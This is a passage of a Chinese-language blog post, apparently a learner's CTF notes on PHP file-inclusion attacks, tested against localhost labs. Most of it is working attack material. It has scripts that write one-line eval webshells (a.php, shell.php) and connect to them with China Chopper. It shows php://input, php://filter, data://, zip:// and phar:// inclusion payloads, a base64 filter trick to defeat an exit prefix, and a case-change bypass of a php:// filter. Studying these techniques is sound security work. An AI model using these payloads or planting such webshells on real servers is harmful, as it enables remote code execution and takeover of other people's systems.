<h6 id="III-kali测试"><a href="#III-kali测试" class="headerlink" title="III.kali测试"></a>III.kali测试</h6><div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cd /<span class="keyword">var</span>/www/html</span><br><span class="line">vim kali.txt</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">phpinfo();</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">service apache2 start<span class="comment">//启动服务器</span></span><br><span class="line">ifconfig<span class="comment">//查看kali的ip</span></span><br></pre></td></tr></table></figure></div>
<p>修改ip地址，测试</p>
<p><img src="/2019/11/22/文件包含/14.png" alt="14"></p>
<p>执行了，kali.txt里的文件，想到一句话木马，看看能不能用菜刀链接上，修改kali.txt的内容</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $a=<span class="string">"&lt;?php @eval($_POST['123'])&gt;"</span>;</span><br><span class="line">    $b=fopen(<span class="string">"a.php"</span>,<span class="string">"w"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"123!"</span>);</span><br><span class="line">    fwrite($b,$a);</span><br><span class="line">    fclose($b);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"木马生成！"</span>;</span><br><span class="line">    <span class="keyword">echo</span> ‘&lt;br/&gt;’;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>他会生成一个a.php的一句话木马，密码为123，然后用菜刀连接</p>
<p><img src="/2019/11/22/文件包含/15.png" alt="15"></p>
<h4 id="0x03各种文件包含姿势"><a href="#0x03各种文件包含姿势" class="headerlink" title="0x03各种文件包含姿势"></a>0x03各种文件包含姿势</h4><p><img src="/2019/11/22/文件包含/16.png" alt="16"></p>
<p>在php.ini里有两个重要的参数allow_url_fopen和allow_url_include</p>
<p>allow_url_fopen:默认值是ON，允许url里的封装协议访问文件</p>
<p>allow_url_include:默认值是OFF,不允许包含url里的封装协议包含文件</p>
<p><strong>PHP.输入输出流</strong></p>
<p>PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。</p>
<h5 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h5><p>php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当文件内容</p>
<p>需要开启allow_url_include</p>
<p>注：当enctype=“multipart/form—data”时，php://input是无效的</p>
<h6 id="php-input绕过file-get-contents"><a href="#php-input绕过file-get-contents" class="headerlink" title="php://input绕过file_get_contents()"></a>php://input绕过file_get_contents()</h6><p>碰到file_get_contents()就要想到用php://input绕过，因为php伪协议也是可以利用http协议的，即可以使用POST方式传数据，具体函数意义下一项；</p>
<p><strong>测试代码：</strong></p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(<span class="string">"php://input"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p><strong>测试结果：</strong></p>
<p><img src="/2019/11/22/文件包含/17.png" alt="17"></p>
<h6 id="php-input（写入木马）"><a href="#php-input（写入木马）" class="headerlink" title="php://input（写入木马）"></a>php://input（写入木马）</h6><p><strong>测试代码：</strong></p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>条件：php配置文件中需同时开启 allow_url_fopen 和 allow_url_include（PHP &lt; 5.3.0）,就可以造成任意代码执行，在这可以理解成远程文件包含漏洞（RFI），即POST过去PHP代码，即可执行。</p>
<p>如果POST的数据是执行写入一句话木马的PHP代码，就会在当前目录下写入一个木马。</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?PHP</span> fputs(fopen(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'&lt;?php @eval($_POST[cmd])?&gt;'</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p><img src="/2019/11/22/文件包含/18.png" alt="18"></p>
<p><strong>测试结果：</strong></p>
<p><img src="/2019/11/22/文件包含/19.png" alt="19"></p>
<h6 id="实操"><a href="#实操" class="headerlink" title="实操"></a>实操</h6><h6 id=""><a href="#" class="headerlink" title=""></a><img src="/2019/11/22/文件包含/20.png" alt="20"></h6><p>特别明显的文件包含</p>
<p><img src="/2019/11/22/文件包含/21.png" alt="21"></p>
<p>他把php://给过滤了，简单，换成大写就🆗了鸭</p>
<p><img src="/2019/11/22/文件包含/22.png" alt="22"></p>
<p><img src="/2019/11/22/文件包含/23.png" alt="23"></p>
<h5 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h5><p>一般用于任意文件读取，有时可以用于getshell，在双off的情况下也能够使用，它是一种元封装器，用于数据流打开筛选过滤应用。对于一体式(all-in-one)的文件函数很有效，类似readfile()、file()、file_get_contents()，在数据流读取之前没有机会使用其他过滤器,<strong><em>因为有时候读取一些敏感的php代码，就需要用到过滤器</em></strong></p>
<p><img src="/2019/11/22/文件包含/A.png" alt=""></p>
<p>ex：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1.</span><br><span class="line">...x=php://filter/read=convert.base64-encode/resource=index.php(url)</span><br><span class="line">2.</span><br><span class="line">&lt;?php</span><br><span class="line">readfile(“php://filter/read=string.toupper/resource=http://www.example.com”);</span><br><span class="line">//会以大写字母输出www.example.com的内容  </span><br><span class="line">?&gt;</span><br><span class="line">3.</span><br><span class="line">&lt;?php</span><br><span class="line">readfile(“php://filter/read=string.toupper|string.rot13/resource=http://www.example.com”); //会在上面的基础上再进行rot13加密</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></div>
<p>read去掉有时候可以绕过一些waf</p>
<p>下面是收集的各种过滤器</p>
<p><img src="/2019/11/22/文件包含/B.png" alt=""></p>
<p><img src="/2019/11/22/文件包含/C.png" alt=""></p>
<p><img src="/2019/11/22/文件包含/D.png" alt=""></p>
<p><img src="/2019/11/22/文件包含/E.png" alt=""></p>
<h6 id="quoted-printable编码解码"><a href="#quoted-printable编码解码" class="headerlink" title="quoted-printable编码解码"></a>quoted-printable编码解码</h6><p>quoted-printable可打印字符引用编码，多用途互联网邮件扩展(MIME)，的一种实现方式，MIME是一个互联网标准，扩展了电子邮件标准，致力于使其能够支持非ASCII字符、二进制格式附件等多种格式的邮件消息。目前http协议中，很多采用MIME框架！quoted——printable就是用一些可打印常用字符，表示一个字节(8位)中所有非打印字符方法</p>
<p>quoted-printable编码方法</p>
<p>任何一个8位的字节值可编码位3个字符：一个等号“=”后面跟随两个16进制数字，表示该字节数值，例如， ASCII码换页符（十进制值为12）可以表示为”=0C”, 等号”=”（十进制值为61）必须表示为”=3D”. 除了可打印ASCII字符与换行符以外，所有字符必须表示为这种格式. </p>
<p>所有可打印ASCII字符(十进制值的范围为33到126)可用ASCII字符编码来直接表示, 但是等号”=”(十进制值为61)不可以这样直接表示.ASCII的水平制表符(tab)与空格符, 十进制为9和32, 如果不出现在行尾则可以用其ASCII字符编码直接表示。如果这两个字符出现在行尾，必须QP编码表示为”=09″ (tab)或”=20″ (space) </p>
<h6 id="实操-1"><a href="#实操-1" class="headerlink" title="实操"></a>实操</h6><div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$content = <span class="string">'&lt;?php exit; ?&gt;'</span>;</span><br><span class="line">$content .= $_POST[<span class="string">'txt'</span>];</span><br><span class="line">file_put_contents($_POST[<span class="string">'filename'</span>], $content);</span><br></pre></td></tr></table></figure></div>
<p>$content在开始的时候拼接上了exit，就算我们成功写入一句话木马，也会被退出，执行不鸟，但是可以通过php://filter绕过：</p>
<p>1.把想要写入的一句话木马进行base64encode</p>
<p>2.然后再利用php://filter对其进行base64decode，而<code>&lt;?php exit; ?&gt;</code>经过base64decode解码后会变成一段乱码(也可以用rot13过滤器)做法，第一步一样，就是在第二步的时候再加多一个字符过滤器<code>string.strip_tags</code>，它能去除php的标签，从而使exit执行不鸟，然后用再用编码过滤器base64decode</p>
<p><img src="/2019/11/22/文件包含/29.png" alt="29"></p>
<h5 id="file-伪协议"><a href="#file-伪协议" class="headerlink" title="file://伪协议"></a>file://伪协议</h5><p>file://在双off的情况下也是可以正常执行的，用于访问本地文件系统，CTF中经常用来读取本地的文件</p>
<p>使用方法：file://文件的绝对路径和文件名</p>
<p>测试代码</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>playload：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="AWK"><figure class="iseeu highlight /awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span>localhost:<span class="number">8088</span><span class="regexp">/ctf/</span>text.php?filename=file:<span class="regexp">//</span>D:<span class="regexp">/phpStudy/</span>PHPTutorial<span class="regexp">/WWW/</span>ctf<span class="regexp">/text.txt</span></span><br></pre></td></tr></table></figure></div>
<p>out<img src="/2019/11/22/文件包含/24.png" alt="24"></p>
<h5 id="data-伪协议"><a href="#data-伪协议" class="headerlink" title="data://伪协议"></a>data://伪协议</h5><p> 数据流封装器，和php://相似都是利用了流的概念，将原本的include的文件流重定向到了用户可控制的输入流中，简单来说就是执行文件的包含方法包含了你的输入流，通过你输入payload来实现目的 , 如果php.ini里的allow_url_include=On（PHP &lt; 5.3.0）,<em>text/plain,后面的值就会被当作php代码执行，</em>就可以造成任意代码执行，同理在这就可以理解成远程文件包含漏洞（RFI） </p>
<p>测试代码： </p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename=$_GET[<span class="string">'filename'</span>]；</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>playload：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="LIVECODESERVER"><figure class="iseeu highlight /livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span><span class="keyword">http</span>://localhost:<span class="number">8088</span>/ctf/<span class="keyword">text</span>.php?filename=data://<span class="keyword">text</span>/plain,<span class="meta">&lt;?</span>php phpinfo();<span class="meta">?&gt;</span></span><br><span class="line"><span class="number">2.</span><span class="keyword">http</span>://localhost:<span class="number">8088</span>/ctf/<span class="keyword">text</span>.php?filename=data://<span class="keyword">text</span>/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</span><br><span class="line"><span class="number">3.</span><span class="keyword">http</span>://localhost:<span class="number">8088</span>/ctf/<span class="keyword">text</span>.php?filename=data:<span class="keyword">text</span>/plain,<span class="meta">&lt;?</span>php phpinfo();<span class="meta">?&gt;</span></span><br><span class="line"><span class="number">4.</span><span class="keyword">http</span>://localhost:<span class="number">8088</span>/ctf/<span class="keyword">text</span>.php?filename=data:<span class="keyword">text</span>/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</span><br></pre></td></tr></table></figure></div>
<p>out：<img src="/2019/11/22/文件包含/25.png" alt="25"></p>
<h5 id="zip-伪协议"><a href="#zip-伪协议" class="headerlink" title="zip://伪协议"></a>zip://伪协议</h5><p> <strong>zip://</strong> 可以访问压缩包里面的文件。当它与包含函数结合时，zip://流会被当作php文件执行。从而实现任意代码执行。</p>
<ul>
<li><p>zip://中只能传入绝对路径。</p>
</li>
<li><p>要用#分隔压缩包和压缩包里的内容，并且#要用url编码%23（即下述POC中#要用%23替换）</p>
</li>
<li><p>只需要是zip的压缩包即可，后缀名可以任意更改。</p>
</li>
<li><p>相同的类型的还有zlib://和bzip2://</p>
<p>测试代码： </p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename=$_GET[<span class="string">'filename'</span>]；</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>步骤：</p>
<ol>
<li>先随便写一句php的代码，文件后缀名是什么都没关系</li>
<li>然后压缩，一定要zip压缩包，然后改后缀名</li>
</ol>
<p>playload：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="TAGGERSCRIPT"><figure class="iseeu highlight /taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/ctf/text.php?filename=zip://D:<span class="symbol">\p</span>hpStudy<span class="symbol">\P</span>HPTutorial<span class="symbol">\W</span>WW<span class="symbol">\c</span>tf<span class="symbol">\s</span>hell.png<span class="variable">%23shell.php</span></span><br></pre></td></tr></table></figure></div>
<p>out<img src="/2019/11/22/文件包含/26.png" alt="26"></p>
</li>
</ul>
<h5 id="phar-伪协议"><a href="#phar-伪协议" class="headerlink" title="phar://伪协议"></a>phar://伪协议</h5><p>这个参数是就是php解压缩包的一个函数，不管后缀是什么，都会当做压缩包来解压。</p>
<p>用法：?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 注意： PHP &gt; =5.3.0 压缩包需要是zip协议压缩，rar不行，将木马文件压缩后，改为其他任意格式的文件都可以正常使用。 相对路径和绝对路径都能使用</p>
<p>步骤： 写一个一句话木马文件shell.php，然后用zip协议压缩为shell.zip，然后将后缀改为png等其他格式。 </p>
<p>测试代码</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename=$_GET[<span class="string">'filename'</span>]；</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>playload</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="LIVECODESERVER"><figure class="iseeu highlight /livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">相对路径：</span><br><span class="line"><span class="keyword">http</span>://localhost:<span class="number">8088</span>/ctf/<span class="keyword">text</span>.php?filename=phar://./<span class="built_in">shell</span>.png/<span class="built_in">shell</span>.php</span><br><span class="line">绝对路径：</span><br><span class="line"><span class="keyword">http</span>://localhost:<span class="number">8088</span>/ctf/<span class="keyword">text</span>.php?filename=phar://D:\phpStudy\PHPTutorial\WWW\ctf\<span class="built_in">shell</span>.png\<span class="built_in">shell</span>.php</span><br></pre></td></tr></table></figure></div>
<p>out：<img src="/2019/11/22/文件包含/27.png" alt="27"></p>
<p><img src="/2019/11/22/文件包含/28.png" alt="28"></p>
<p>参考链接：(新手,能本地测试成功的，都用的自己图，失败的借用大佬的，还参考了很多文章，有些链接忘了贴，仅供自己学习参考用)</p>
<blockquote>
<p> <a href="https://www.freebuf.com/articles/web/182280.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/182280.html</a> </p>
<p> <a href="https://www.0dayhack.com/post-531.html" target="_blank" rel="noopener">https://www.0dayhack.com/post-531.html</a> </p>
<p> <a href="https://blog.csdn.net/ncafei/article/details/62085462" target="_blank" rel="noopener">https://blog.csdn.net/ncafei/article/details/62085462</a> </p>
<p> <a href="https://blog.bbskali.cn/index.php/archives/1107/" target="_blank" rel="noopener">https://blog.bbskali.cn/index.php/archives/1107/</a> </p>
</blockquote>

      
    </div>
    
      <footer class="article-footer">
        完
      </footer>
    
  </div>
  
    
<nav id="article-nav">
  <div class="article-nav-block">
    
  </div>
  <div class="article-nav-block">
    
      <a href="/2018/12/08/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
        <div class="article-nav-title">Hello World</div>
        <strong class="article-nav-caption"></strong>
      </a>
    
  </div>
</nav>

    <link rel="stylesheet" href="/css/gitment.css"> 
<script src="/js/gitment.js"></script>

<div id="gitmentContainer"></div>

<script>
var gitment = new Gitment({
  owner: '',
  repo: '',
  oauth: {
    client_id: '',
    client_secret: '',
  },
})
gitment.render('gitmentContainer')
</script>

  
  
</article>
</section>
        <aside id="sidebar">
  
    <div class="widget-box">
  <div class="avatar-box">
    <img class="avatar" src="/images/default-avatar.jpg" title="图片来自网络">
    <h3 class="avatar-name">
      
        向北
      
    </h3>
    <p class="avatar-slogan">
      静水流深，沧笙踏歌。
    </p>
  </div>
</div>


  
    

  
    

  
    
  
    
  <div class="widget-box">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">十一月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/12/">十二月 2018</a></li></ul>
    </div>
  </div>

  
    
  <div class="widget-box">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/11/22/文件包含/">文件包含</a>
          </li>
        
          <li>
            <a href="/2018/12/08/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
      <div class="widget-box">
    <h3 class="widget-title">友链</h3>
    <div class="widget">
      
    </div>
  </div>

  
</aside>
      </div>
      <footer id="footer">
  <div class="foot-box global-width">
    &copy; 2019 Erics &nbsp;&nbsp;
    驱动于 <a href="http://hexo.io/" target="_blank">Hexo</a>
    &nbsp;|&nbsp;主题 <a href="https://github.com/yiluyanxia/hexo-theme-antiquity">antiquity</a>
    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">不蒜子告之   阁下是第<span id="busuanzi_value_site_pv"></span>个访客</span>
  </div>
</footer>
      <script src="https://code.jquery.com/jquery-2.0.3.min.js"></script>
<script>
if (!window.jQuery) {
var script = document.createElement('script');
script.src = "/js/jquery-2.0.3.min.js";
document.body.write(script);
}
</script>

  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



    </div>
    <nav id="mobile-nav" class="mobile-nav-box">
  <div class="mobile-nav-img mobile-nav-top"></div>
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
  <div class="mobile-nav-img  mobile-nav-bottom"></div>
</nav>    
  </div>
</body>
</html>